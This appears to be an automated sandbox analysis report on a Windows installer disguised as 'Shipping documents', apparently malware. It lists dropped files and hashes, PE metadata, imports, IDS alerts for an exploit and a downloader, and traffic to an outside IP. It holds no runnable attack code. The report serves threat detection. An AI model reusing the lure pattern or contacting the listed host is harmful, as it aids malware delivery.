Process:	C:\Users\user\Desktop\Shipping documents 000293994900.exe
File Type:	data
Category:	dropped
Size (bytes):	415829
Entropy (8bit):	7.579423942121959
Encrypted:	false
SSDEEP:	6144:PSVbwty/u9FVKuY9k9Dk6b1hjXtum6gLDPcEtAm3fCTayt7VoTigGIf:P39FQn9MHbbZum6sYEtAm3fCeytwiif
MD5:	CFDFBBFE68368C2DB2DACCD1E5542993
SHA1:	CD97C7BFD54ABCB5675CCA3049A38DBD0733C04A
SHA-256:	4857268BEEE7F2E10237B8570D73DA6775AC19AE5EB5B29739053B76087C1A21
SHA-512:	7EE5133835D8B4C5B829216485AD1952C6CFB0A4BEFB6DCD4788C760B6251BE576D2F5646AAADC6B3E49655DFA5A718DACD7E91AB29ED8744AC54D1B7558B3D3
Malicious:	false
Reputation:	low
Preview:	......................................./..............H...................ddd......7....................LL..(...V.................................ffff....>.......H.........iii.[................................TT......DD........^.y........8..(.......5..yy......N............3.......ee...........H...?????............C.......................w.@................^........))).......'..xx....}......99.......x.....o.:::...zzz...\|.............z........aa...................j.r.........[.....=........AA..ee..........??.x...............Y.............Q....ee........p.!........((...........................!..................................JJJ..............zz....##.nnnn..B.%....H..................;............<..L...........................%..........uu.>>...................................vvvv............~.................zzzzzzzz...<............88....................uu........H........S..<...................""......X......MMM.9....................t......ww.I..`............w....J.....................

C:\Users\user\Uploadable\normallnnens\Wodewose235.enc

Download File

Process:	C:\Users\user\Desktop\Shipping documents 000293994900.exe
File Type:	data
Category:	dropped
Size (bytes):	34164
Entropy (8bit):	2.280731480965403
Encrypted:	false
SSDEEP:	384:Hn4soqyBjp3VRJ8c1VeHzeF8mjExy8jaw5zjnyh+:Ys3aPJzeTeMxy8j15J
MD5:	091BC262A5D568D2DD2CE1C16934963B
SHA1:	58F0086F8C18C516BBBFC86BD9F1B6098E043019
SHA-256:	34B4DFD59AE76D70C89C05E2B7D42C5177C14912E5602F3488F14CB2BEC3AE15
SHA-512:	019ACBFCFCAF1645A2E365AAC15A15B60EFC1F144CB7C9A703413BAAD79B800037589C80326BE41B487AF8B22F532526301F561EDA67B0F4B7D007A9A4451EF6
Malicious:	false
Preview:	............r.........*.................................................k..........................\|.C.................&.....................................3...........;........i>..[2....B.........B.....h.................V.............................................................0...x....<...(.............................................:............C.......q....................u..........................................................."..........g.....E..................................6..................................n......4...........O.....:..........B.O..............8......X........8...t........................... ..7.fJ#.....\|..............)........................1...........X....(..........................4.............................>.c.........F..............\........t......;.................W.............;..................................3.........L..m.........<.......(.................i...........@...........+..............o.f.....{...............bW...........4..

C:\Users\user\Uploadable\normallnnens\dharma.txt

Download File

Process:	C:\Users\user\Desktop\Shipping documents 000293994900.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	400
Entropy (8bit):	4.340884176214527
Encrypted:	false
SSDEEP:	12:ABodXqUr8bKPlUsoyXqy6oHLrccOrMH2m:kaq+vUWqv08VMf
MD5:	71229AB517CA5DAC3316733FE5538924
SHA1:	0DB282ED1142AA8D850E0BEC60D502DF3A8D786B
SHA-256:	C7FB70336975F025E346E7B884A1641BDF4A9510315D059F1509A51249EDDD07
SHA-512:	77C36AFF187EC195EAF128B4696F54E18B297A9797922ECA97E3147EE9F49A0BA15ECB81BE7ED65C6D199D83EA8BC7823D30AACBA5B35351312EBAB25C658DDC
Malicious:	false
Preview:	retsmdes cakavci stykvrker terylene penumbrous cuprotungstite paleontology sukrings..extravasation kunstmaler naturvidenskabeliges pointer nabbers pasfotografi forholdende anesthaetically feberkramper..savvrk optimalvrdierne oversigterne.serpuloid astrobiological decimaltegn udefinerbar,acidophil gis bolvrks hretisk sprays sevald tamilske,makie adherant indsejling kassedamerne fluor pantochromism.

C:\Users\user\Uploadable\normallnnens\shears.sip

Download File

Process:	C:\Users\user\Desktop\Shipping documents 000293994900.exe
File Type:	data
Category:	dropped
Size (bytes):	14243
Entropy (8bit):	2.3093269369302396
Encrypted:	false
SSDEEP:	192:ys2EB7EvpKyCMZFGrgNerrpDYvMo4E1+iI2tjx:ysfdCyGerrpUvxZ+7+t
MD5:	B6F7202B553B5DC0A1B7D7B141FE8A64
SHA1:	68B48ED6E05998B9F6E590510F74AD5677620EE7
SHA-256:	D1465221589C115AFA440E20E7E63E6E7D70B8DAE1CA87710A8FFD6D7D8EADC5
SHA-512:	4D7B9795444537247FF1851B0C557A1235E90DDDB49ABCDC64DBC9612BB2347D675734FAA6121D0875EF099B0C453A278C977463CE1D4453142CB19127244506
Malicious:	false
Preview:	....0.........................................(..........!.................+....................k..[............Z...............&....................$...................................;.........................................).................................;...................no.........N................k...........X..........g.....................R.........4.....h..e....................................>.....O...Q.....................r+......n..............x... .....B....................R...........................U..................................0......i....m............>................l.......[.....................................p.....................................u.....K.G...s...................3..................p..........v.......w....E......Cr.......................................................F.............m#...............].T.......................*.......j............................4a...............................n....r............b..............................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Entropy (8bit):	7.672045494218853
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	Shipping documents 000293994900.exe
File size:	739'546 bytes
MD5:	c8d26f7208eaaa31a839ec190489c9a1
SHA1:	c9bc4695a4f4afdcc89d216b7ad8d0ce4d0bc7e3
SHA256:	f96b6c703fe5b13fd985d91da265c58d3d5b2f81397ebe27527e59c208819d2e
SHA512:	30983bc1f3b8fc96023d5b2773ab41ee1ced9718334d1cc50a24143a4d6ed04dfdc9400c9f401df20bc7dd05919a5936b3e7fb97c7504f804cd06210eee7f168
SSDEEP:	12288:8tvD9kg2V9Lki65FEdYjpTEl9msWkXfflWGwzc7MnWAdV/sPsrVawwDXZsBwRsOd:1XlP60dM4b1nlMGMnWAdV9wtsBShx
TLSH:	ADF4224E3AD4A436CD663D77997ECBA9F270BB2508A42E0336807F2F0A7761F6514217
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1.D9u.ju.ju.j..ujw.ju.+j..j..wjd.j!..j..j..,jt.jRichu.j........PE..L....f.R.................`.........X3.......p....@

File Icon


Icon Hash:	86933931792d7578

Static PE Info

General

Entrypoint:	0x403358
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
DLL Characteristics:	TERMINAL_SERVER_AWARE
Time Stamp:	0x52BA66B2 [Wed Dec 25 05:01:38 2013 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	e221f4f7d36469d53810a4b5f9fc8966

Entrypoint Preview

Instruction
sub esp, 000002D4h
push ebx
push ebp
push esi
push edi
push 00000020h
xor ebp, ebp
pop esi
mov dword ptr [esp+14h], ebp
mov dword ptr [esp+10h], 00409230h
mov dword ptr [esp+1Ch], ebp
call dword ptr [00407034h]
push 00008001h
call dword ptr [004070BCh]
push ebp
call dword ptr [004072ACh]
push 00000008h
mov dword ptr [00429298h], eax
call 00007F6831031FBCh
mov dword ptr [004291E4h], eax
push ebp
lea eax, dword ptr [esp+34h]
push 000002B4h
push eax
push ebp
push 00420690h
call dword ptr [0040717Ch]
push 0040937Ch
push 004281E0h
call 00007F6831031C27h
call dword ptr [00407134h]
mov ebx, 00434000h
push eax
push ebx
call 00007F6831031C15h
push ebp
call dword ptr [0040710Ch]
cmp word ptr [00434000h], 0022h
mov dword ptr [004291E0h], eax
mov eax, ebx
jne 00007F683102F10Ah
push 00000022h
mov eax, 00434002h
pop esi
push esi
push eax
call 00007F6831031666h
push eax
call dword ptr [00407240h]
mov dword ptr [esp+18h], eax
jmp 00007F683102F1CEh
push 00000020h
pop edx
cmp cx, dx
jne 00007F683102F109h
inc eax
inc eax
cmp word ptr [eax], dx
je 00007F683102F0FBh
add word ptr [eax], 0000h

Rich Headers

Programming Language:

[EXP] VC++ 6.0 SP5 build 8804

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x7494	0xb4	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x54000	0x2d490	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x7000	0x2b8	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x5e66	0x6000	e8f12472e91b02deb619070e6ee7f1f4	False	0.6566569010416666	data	6.419409887460116	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x7000	0x1354	0x1400	2222fe44ebbadbc32af32dfc9c88e48e	False	0.4306640625	data	5.037511188789184	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x9000	0x202d8	0x600	a5ec1b720d350c6303a7aba8d85072bf	False	0.4733072916666667	data	3.7600484096214832	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.ndata	0x2a000	0x2a000	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x54000	0x2d490	0x2d600	3469fad129cc4f5d98277ff568dc0969	False	0.603391873278237	data	6.111326163907691	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0x54358	0x10828	Device independent bitmap graphic, 128 x 256 x 32, image size 67584	English	United States	0.376375251390039
RT_ICON	0x64b80	0xe444	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	English	United States	0.9933089191594223
RT_ICON	0x72fc8	0x5488	Device independent bitmap graphic, 72 x 144 x 32, image size 21600	English	United States	0.4520794824399261
RT_ICON	0x78450	0x4228	Device independent bitmap graphic, 64 x 128 x 32, image size 16896	English	United States	0.4557156353330184
RT_ICON	0x7c678	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9600	English	United States	0.5064315352697095
RT_ICON	0x7ec20	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4224	English	United States	0.551829268292683
RT_ICON	0x7fcc8	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 2400	English	United States	0.6086065573770492
RT_ICON	0x80650	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1088	English	United States	0.6719858156028369
RT_DIALOG	0x80ab8	0x100	data	English	United States	0.5234375
RT_DIALOG	0x80bb8	0x11c	data	English	United States	0.6056338028169014
RT_DIALOG	0x80cd8	0xc4	data	English	United States	0.5918367346938775
RT_DIALOG	0x80da0	0x60	data	English	United States	0.7291666666666666
RT_GROUP_ICON	0x80e00	0x76	data	English	United States	0.7542372881355932
RT_VERSION	0x80e78	0x310	data	English	United States	0.4846938775510204
RT_MANIFEST	0x81188	0x305	XML 1.0 document, ASCII text, with very long lines (773), with no line terminators	English	United States	0.5614489003880984

Imports

DLL	Import
KERNEL32.dll	CompareFileTime, SearchPathW, SetFileTime, CloseHandle, GetShortPathNameW, MoveFileW, SetCurrentDirectoryW, GetFileAttributesW, GetLastError, GetFullPathNameW, CreateDirectoryW, Sleep, GetTickCount, CreateFileW, GetFileSize, GetModuleFileNameW, GetCurrentProcess, CopyFileW, ExitProcess, SetEnvironmentVariableW, GetWindowsDirectoryW, SetFileAttributesW, ExpandEnvironmentStringsW, SetErrorMode, LoadLibraryW, lstrlenW, lstrcpynW, GetDiskFreeSpaceW, GlobalUnlock, GlobalLock, CreateThread, CreateProcessW, RemoveDirectoryW, lstrcmpiA, GetTempFileNameW, lstrcpyA, lstrcpyW, lstrcatW, GetSystemDirectoryW, GetVersion, GetProcAddress, LoadLibraryA, GetModuleHandleA, GetModuleHandleW, lstrcmpiW, lstrcmpW, WaitForSingleObject, GlobalFree, GlobalAlloc, LoadLibraryExW, GetExitCodeProcess, FreeLibrary, WritePrivateProfileStringW, GetCommandLineW, GetTempPathW, GetPrivateProfileStringW, FindFirstFileW, FindNextFileW, DeleteFileW, SetFilePointer, ReadFile, FindClose, MulDiv, MultiByteToWideChar, WriteFile, lstrlenA, WideCharToMultiByte
USER32.dll	EndDialog, ScreenToClient, GetWindowRect, RegisterClassW, EnableMenuItem, GetSystemMenu, SetClassLongW, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongW, SetCursor, LoadCursorW, CheckDlgButton, GetMessagePos, LoadBitmapW, CallWindowProcW, IsWindowVisible, CloseClipboard, SetClipboardData, wsprintfW, CreateWindowExW, SystemParametersInfoW, AppendMenuW, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharPrevW, CharNextA, wsprintfA, DispatchMessageW, PeekMessageW, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, GetDC, SetWindowLongW, LoadImageW, SendMessageTimeoutW, FindWindowExW, EmptyClipboard, OpenClipboard, TrackPopupMenu, EndPaint, ShowWindow, GetDlgItem, IsWindow, SetForegroundWindow
GDI32.dll	SelectObject, SetBkMode, CreateFontIndirectW, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
SHELL32.dll	SHGetSpecialFolderLocation, SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, ShellExecuteW, SHFileOperationW
ADVAPI32.dll	RegCloseKey, RegOpenKeyExW, RegDeleteKeyW, RegDeleteValueW, RegEnumValueW, RegCreateKeyExW, RegSetValueExW, RegQueryValueExW, RegEnumKeyW
COMCTL32.dll	ImageList_Create, ImageList_AddMasked, ImageList_Destroy
ole32.dll	CoCreateInstance, CoTaskMemFree, OleInitialize, OleUninitialize
VERSION.dll	GetFileVersionInfoSizeW, GetFileVersionInfoW, VerQueryValueW

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-10-31T11:39:18.753332+0100	2022930	ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow	1	4.175.87.197	443	192.168.2.5	49704	TCP
2024-10-31T11:39:59.461244+0100	2022930	ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow	1	4.175.87.197	443	192.168.2.5	56127	TCP
2024-10-31T11:40:48.544514+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.5	56194	84.38.133.42	80	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 31, 2024 11:40:47.716845989 CET	56194	80	192.168.2.5	84.38.133.42
Oct 31, 2024 11:40:47.721791983 CET	80	56194	84.38.133.42	192.168.2.5
Oct 31, 2024 11:40:47.721913099 CET	56194	80	192.168.2.5	84.38.133.42
Oct 31, 2024 11:40:47.722033024 CET	56194	80	192.168.2.5	84.38.133.42
Oct 31, 2024 11:40:47.726777077 CET	80	56194	84.38.133.42	192.168.2.5
Oct 31, 2024 11:40:48.544364929 CET	80	56194	84.38.133.42	192.168.2.5
Oct 31, 2024 11:40:48.544387102 CET	80	56194	84.38.133.42	192.168.2.5
Oct 31, 2024 11:40:48.544399023 CET	80	56194	84.38.133.42	192.168.2.5
Oct 31, 2024 11:40:48.544409990 CET	80	56194	84.38.133.42	192.168.2.5
Oct 31, 2024 11:40:48.544421911 CET	80	56194	84.38.133.42	192.168.2.5
Oct 31, 2024 11:40:48.544431925 CET	80	56194	84.38.133.42	192.168.2.5
Oct 31, 2024 11:40:48.544513941 CET	56194	80	192.168.2.5	84.38.133.42
Oct 31, 2024 11:40:48.544620037 CET	56194	80	192.168.2.5	84.38.133.42
Oct 31, 2024 11:40:48.659996986 CET	80	56194	84.38.133.42	192.168.2.5
Oct 31, 2024 11:40:48.660048962 CET	80	56194	84.38.133.42	192.168.2.5
Oct 31, 2024 11:40:48.660062075 CET	80	56194	84.38.133.42	192.168.2.5
Oct 31, 2024 11:40:48.660072088 CET	80	56194	84.38.133.42	192.168.2.5
Oct 31, 2024 11:40:48.660088062 CET	80	56194	84.38.133.42	192.168.2.5
Oct 31, 2024 11:40:48.660124063 CET	80	56194	84.38.133.42	192.168.2.5
Oct 31, 2024 11:40:48.660135031 CET	80	56194	84.38.133.42	192.168.2.5
Oct 31, 2024 11:40:48.660140038 CET	56194	80	192.168.2.5	84.38.133.42
Oct 31, 2024 11:40:48.660149097 CET	80	56194	84.38.133.42	192.168.2.5
Oct 31, 2024 11:40:48.660162926 CET	80	56194	84.38.133.42	192.168.2.5
Oct 31, 2024 11:40:48.660167933 CET	56194	80	192.168.2.5	84.38.133.42
Oct 31, 2024 11:40:48.660222054 CET	56194	80	192.168.2.5	84.38.133.42
Oct 31, 2024 11:40:48.661145926 CET	80	56194	84.38.133.42	192.168.2.5
Oct 31, 2024 11:40:48.661170006 CET	80	56194	84.38.133.42	192.168.2.5
Oct 31, 2024 11:40:48.661180973 CET	80	56194	84.38.133.42	192.168.2.5
Oct 31, 2024 11:40:48.661231041 CET	56194	80	192.168.2.5	84.38.133.42
Oct 31, 2024 11:40:48.661231041 CET	56194	80	192.168.2.5	84.38.133.42
Oct 31, 2024 11:40:48.775604963 CET	80	56194	84.38.133.42	192.168.2.5
Oct 31, 2024 11:40:48.775641918 CET	80	56194	84.38.133.42	192.168.2.5
Oct 31, 2024 11:40:48.775666952 CET	80	56194	84.38.133.42	192.168.2.5
Oct 31, 2024 11:40:48.775718927 CET	80	56194	84.38.133.42	192.168.2.5
Oct 31, 2024 11:40:48.775748968 CET	56194	80	192.168.2.5	84.38.133.42
Oct 31, 2024 11:40:48.775789976 CET	56194	80	192.168.2.5	84.38.133.42
Oct 31, 2024 11:40:48.775859118 CET	80	56194	84.38.133.42	192.168.2.5
Oct 31, 2024 11:40:48.775921106 CET	80	56194	84.38.133.42	192.168.2.5
Oct 31, 2024 11:40:48.775934935 CET	80	56194	84.38.133.42	192.168.2.5
Oct 31, 2024 11:40:48.775945902 CET	80	56194	84.38.133.42	192.168.2.5
Oct 31, 2024 11:40:48.775971889 CET	56194	80	192.168.2.5	84.38.133.42
Oct 31, 2024 11:40:48.776004076 CET	56194	80	192.168.2.5	84.38.133.42
Oct 31, 2024 11:40:48.776721954 CET	80	56194	84.38.133.42	192.168.2.5
Oct 31, 2024 11:40:48.776813984 CET	80	56194	84.38.133.42	192.168.2.5
Oct 31, 2024 11:40:48.776823997 CET	80	56194	84.38.133.42	192.168.2.5
Oct 31, 2024 11:40:48.776866913 CET	56194	80	192.168.2.5	84.38.133.42
Oct 31, 2024 11:40:48.776881933 CET	80	56194	84.38.133.42	192.168.2.5
Oct 31, 2024 11:40:48.776930094 CET	56194	80	192.168.2.5	84.38.133.42
Oct 31, 2024 11:40:48.777085066 CET	80	56194	84.38.133.42	192.168.2.5
Oct 31, 2024 11:40:48.777096033 CET	80	56194	84.38.133.42	192.168.2.5
Oct 31, 2024 11:40:48.777107000 CET	80	56194	84.38.133.42	192.168.2.5
Oct 31, 2024 11:40:48.777117968 CET	80	56194	84.38.133.42	192.168.2.5
Oct 31, 2024 11:40:48.777137995 CET	56194	80	192.168.2.5	84.38.133.42
Oct 31, 2024 11:40:48.777169943 CET	56194	80	192.168.2.5	84.38.133.42
Oct 31, 2024 11:40:48.777688026 CET	80	56194	84.38.133.42	192.168.2.5
Oct 31, 2024 11:40:48.777705908 CET	80	56194	84.38.133.42	192.168.2.5
Oct 31, 2024 11:40:48.777723074 CET	80	56194	84.38.133.42	192.168.2.5
Oct 31, 2024 11:40:48.777734995 CET	80	56194	84.38.133.42	192.168.2.5
Oct 31, 2024 11:40:48.777744055 CET	56194	80	192.168.2.5	84.38.133.42
Oct 31, 2024 11:40:48.777744055 CET	56194	80	192.168.2.5	84.38.133.42
Oct 31, 2024 11:40:48.777746916 CET	80	56194	84.38.133.42	192.168.2.5
Oct 31, 2024 11:40:48.777780056 CET	56194	80	192.168.2.5	84.38.133.42
Oct 31, 2024 11:40:48.777780056 CET	56194	80	192.168.2.5	84.38.133.42
Oct 31, 2024 11:40:48.777817011 CET	56194	80	192.168.2.5	84.38.133.42
Oct 31, 2024 11:40:48.778542042 CET	80	56194	84.38.133.42	192.168.2.5
Oct 31, 2024 11:40:48.778584957 CET	80	56194	84.38.133.42	192.168.2.5
Oct 31, 2024 11:40:48.778594971 CET	80	56194	84.38.133.42	192.168.2.5
Oct 31, 2024 11:40:48.778649092 CET	56194	80	192.168.2.5	84.38.133.42
Oct 31, 2024 11:40:48.778649092 CET	56194	80	192.168.2.5	84.38.133.42
Oct 31, 2024 11:40:49.018129110 CET	80	56194	84.38.133.42	192.168.2.5
Oct 31, 2024 11:40:49.018450022 CET	80	56194	84.38.133.42	192.168.2.5
Oct 31, 2024 11:40:49.018467903 CET	80	56194	84.38.133.42	192.168.2.5
Oct 31, 2024 11:40:49.018477917 CET	80	56194	84.38.133.42	192.168.2.5
Oct 31, 2024 11:40:49.018490076 CET	80	56194	84.38.133.42	192.168.2.5
Oct 31, 2024 11:40:49.018515110 CET	56194	80	192.168.2.5	84.38.133.42
Oct 31, 2024 11:40:49.018538952 CET	56194	80	192.168.2.5	84.38.133.42
Oct 31, 2024 11:40:49.018548012 CET	56194	80	192.168.2.5	84.38.133.42
Oct 31, 2024 11:40:49.018565893 CET	80	56194	84.38.133.42	192.168.2.5
Oct 31, 2024 11:40:49.019567966 CET	80	56194	84.38.133.42	192.168.2.5
Oct 31, 2024 11:40:49.019586086 CET	80	56194	84.38.133.42	192.168.2.5
Oct 31, 2024 11:40:49.019598007 CET	80	56194	84.38.133.42	192.168.2.5
Oct 31, 2024 11:40:49.019609928 CET	80	56194	84.38.133.42	192.168.2.5
Oct 31, 2024 11:40:49.019618034 CET	56194	80	192.168.2.5	84.38.133.42
Oct 31, 2024 11:40:49.019618034 CET	56194	80	192.168.2.5	84.38.133.42
Oct 31, 2024 11:40:49.019635916 CET	56194	80	192.168.2.5	84.38.133.42
Oct 31, 2024 11:40:49.019648075 CET	56194	80	192.168.2.5	84.38.133.42
Oct 31, 2024 11:40:49.019670010 CET	80	56194	84.38.133.42	192.168.2.5
Oct 31, 2024 11:40:49.019680977 CET	80	56194	84.38.133.42	192.168.2.5
Oct 31, 2024 11:40:49.019690990 CET	80	56194	84.38.133.42	192.168.2.5
Oct 31, 2024 11:40:49.019701958 CET	80	56194	84.38.133.42	192.168.2.5
Oct 31, 2024 11:40:49.019714117 CET	56194	80	192.168.2.5	84.38.133.42
Oct 31, 2024 11:40:49.019717932 CET	80	56194	84.38.133.42	192.168.2.5
Oct 31, 2024 11:40:49.019723892 CET	56194	80	192.168.2.5	84.38.133.42
Oct 31, 2024 11:40:49.019752979 CET	56194	80	192.168.2.5	84.38.133.42
Oct 31, 2024 11:40:49.019861937 CET	80	56194	84.38.133.42	192.168.2.5
Oct 31, 2024 11:40:49.019928932 CET	80	56194	84.38.133.42	192.168.2.5
Oct 31, 2024 11:40:49.019941092 CET	80	56194	84.38.133.42	192.168.2.5
Oct 31, 2024 11:40:49.019949913 CET	80	56194	84.38.133.42	192.168.2.5
Oct 31, 2024 11:40:49.019962072 CET	80	56194	84.38.133.42	192.168.2.5
Oct 31, 2024 11:40:49.019969940 CET	56194	80	192.168.2.5	84.38.133.42
Oct 31, 2024 11:40:49.019984961 CET	56194	80	192.168.2.5	84.38.133.42
Oct 31, 2024 11:40:49.020008087 CET	56194	80	192.168.2.5	84.38.133.42
Oct 31, 2024 11:40:49.020800114 CET	80	56194	84.38.133.42	192.168.2.5
Oct 31, 2024 11:40:49.020839930 CET	80	56194	84.38.133.42	192.168.2.5
Oct 31, 2024 11:40:49.020855904 CET	80	56194	84.38.133.42	192.168.2.5
Oct 31, 2024 11:40:49.020868063 CET	80	56194	84.38.133.42	192.168.2.5
Oct 31, 2024 11:40:49.020879984 CET	80	56194	84.38.133.42	192.168.2.5
Oct 31, 2024 11:40:49.020881891 CET	56194	80	192.168.2.5	84.38.133.42
Oct 31, 2024 11:40:49.020912886 CET	56194	80	192.168.2.5	84.38.133.42
Oct 31, 2024 11:40:49.020927906 CET	56194	80	192.168.2.5	84.38.133.42
Oct 31, 2024 11:40:49.022365093 CET	80	56194	84.38.133.42	192.168.2.5
Oct 31, 2024 11:40:49.022408009 CET	80	56194	84.38.133.42	192.168.2.5
Oct 31, 2024 11:40:49.022429943 CET	80	56194	84.38.133.42	192.168.2.5
Oct 31, 2024 11:40:49.022437096 CET	80	56194	84.38.133.42	192.168.2.5
Oct 31, 2024 11:40:49.022443056 CET	80	56194	84.38.133.42	192.168.2.5
Oct 31, 2024 11:40:49.022536039 CET	56194	80	192.168.2.5	84.38.133.42
Oct 31, 2024 11:40:49.022695065 CET	80	56194	84.38.133.42	192.168.2.5
Oct 31, 2024 11:40:49.022752047 CET	80	56194	84.38.133.42	192.168.2.5
Oct 31, 2024 11:40:49.022763968 CET	80	56194	84.38.133.42	192.168.2.5
Oct 31, 2024 11:40:49.022797108 CET	56194	80	192.168.2.5	84.38.133.42
Oct 31, 2024 11:40:49.022813082 CET	80	56194	84.38.133.42	192.168.2.5
Oct 31, 2024 11:40:49.022818089 CET	56194	80	192.168.2.5	84.38.133.42
Oct 31, 2024 11:40:49.022825956 CET	80	56194	84.38.133.42	192.168.2.5
Oct 31, 2024 11:40:49.022866964 CET	56194	80	192.168.2.5	84.38.133.42
Oct 31, 2024 11:40:49.023374081 CET	80	56194	84.38.133.42	192.168.2.5
Oct 31, 2024 11:40:49.023396015 CET	80	56194	84.38.133.42	192.168.2.5
Oct 31, 2024 11:40:49.023407936 CET	80	56194	84.38.133.42	192.168.2.5
Oct 31, 2024 11:40:49.023447990 CET	80	56194	84.38.133.42	192.168.2.5
Oct 31, 2024 11:40:49.023447990 CET	56194	80	192.168.2.5	84.38.133.42
Oct 31, 2024 11:40:49.023447990 CET	56194	80	192.168.2.5	84.38.133.42
Oct 31, 2024 11:40:49.023468971 CET	80	56194	84.38.133.42	192.168.2.5
Oct 31, 2024 11:40:49.023510933 CET	56194	80	192.168.2.5	84.38.133.42
Oct 31, 2024 11:40:49.024271011 CET	80	56194	84.38.133.42	192.168.2.5
Oct 31, 2024 11:40:49.024326086 CET	80	56194	84.38.133.42	192.168.2.5
Oct 31, 2024 11:40:49.024336100 CET	80	56194	84.38.133.42	192.168.2.5
Oct 31, 2024 11:40:49.024347067 CET	80	56194	84.38.133.42	192.168.2.5
Oct 31, 2024 11:40:49.024358034 CET	80	56194	84.38.133.42	192.168.2.5
Oct 31, 2024 11:40:49.024374962 CET	56194	80	192.168.2.5	84.38.133.42
Oct 31, 2024 11:40:49.024422884 CET	56194	80	192.168.2.5	84.38.133.42
Oct 31, 2024 11:40:49.024422884 CET	56194	80	192.168.2.5	84.38.133.42
Oct 31, 2024 11:40:49.025104046 CET	80	56194	84.38.133.42	192.168.2.5
Oct 31, 2024 11:40:49.025115013 CET	80	56194	84.38.133.42	192.168.2.5
Oct 31, 2024 11:40:49.025126934 CET	80	56194	84.38.133.42	192.168.2.5
Oct 31, 2024 11:40:49.025161028 CET	56194	80	192.168.2.5	84.38.133.42
Oct 31, 2024 11:40:49.025187969 CET	56194	80	192.168.2.5	84.38.133.42
Oct 31, 2024 11:40:49.025191069 CET	80	56194	84.38.133.42	192.168.2.5
Oct 31, 2024 11:40:49.025204897 CET	80	56194	84.38.133.42	192.168.2.5
Oct 31, 2024 11:40:49.025248051 CET	56194	80	192.168.2.5	84.38.133.42
Oct 31, 2024 11:40:49.025959969 CET	80	56194	84.38.133.42	192.168.2.5
Oct 31, 2024 11:40:49.026092052 CET	80	56194	84.38.133.42	192.168.2.5
Oct 31, 2024 11:40:49.026117086 CET	80	56194	84.38.133.42	192.168.2.5
Oct 31, 2024 11:40:49.026130915 CET	80	56194	84.38.133.42	192.168.2.5
Oct 31, 2024 11:40:49.026149035 CET	56194	80	192.168.2.5	84.38.133.42
Oct 31, 2024 11:40:49.026149035 CET	56194	80	192.168.2.5	84.38.133.42
Oct 31, 2024 11:40:49.026184082 CET	56194	80	192.168.2.5	84.38.133.42
